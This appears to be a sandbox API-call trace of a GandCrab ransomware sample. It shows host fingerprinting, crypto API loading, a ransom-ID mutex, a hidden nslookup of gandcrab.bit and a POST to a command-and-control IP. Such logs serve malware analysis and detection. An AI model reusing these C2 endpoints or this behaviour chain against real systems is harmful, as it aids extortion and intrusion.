File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7479d8d0 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x74780000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74798b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74798c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74798c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x74799fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7479fbc0 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x74780000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x747a6530 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74798c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x747a6340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x747a64a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x7479a770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x747bd410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x747a6510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x747a6300 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x774b53c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x747a6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x747a57f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x747992b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x74799a90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x7479fcb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x747977b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7479fbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x74797960 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x747a60f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x74797540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x7479c8c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7479a510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x747a5f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x774c2570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74792d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x74790570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x7479ee30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7479c9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x74797610 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x774b95f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x747a6250 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x747978d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x747a61d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x747a6290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x7479a410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x747a3e90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x747a62e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x747a4cc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x747a6450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7479d8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74799700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x747a5f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x747bd320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x747991e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74792db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x747a6420 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x747a6180 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74799560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x747a6590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74799660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x747994b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x74798c10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x747a5fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x747a6360 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x74799540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x7479e320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74799640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74798b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x747a7510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74792d80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74797940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74797910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x747925e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7749da90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x747a3a30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x7479efc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x747a74f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74799680 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x77083230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x77067740 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x77084ea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x770856f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7706b9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x77068ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x77067710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x77061830 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x77084ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x770850f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7707ddf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x770852a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x770691c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x770638f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x77063e40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x774dcaa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x77077020 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75660000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x7570a630 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x74caf8f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74caf0c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74caf0a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74caf550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74caefa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74cb0730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x74cc5c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74cb0ad0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x74caf890 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x74cc5bd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x74cb3fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x74cafc10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74cb0ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74caed60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74caed80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74cb04a0 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x75e1edb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e24370 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e24cb0 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x74d10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x74d58040 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x74d32290 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x742c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x74334510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x74389fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x74342410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x74332460 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x7435b650 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x743311e0 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74200000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x7421c544 True 1
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77486b10 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77486b10 True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77486b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup gandcrab.bit a.dnspod.com, os_pid = 0xaa8, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 147 True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 512 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Module Create Mapping module_name = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, protection = PAGE_WRITECOPY, maximum_size = 0 True 1
Fn
Module Map C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, desired_access = FILE_MAP_COPY True 1
Fn
Module Unmap process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 78.155.206.6, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = curl.php?token=1019, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 78.155.206.6/curl.php?token=1019 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 5709 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 97046 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = Ticks, time = 238484 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
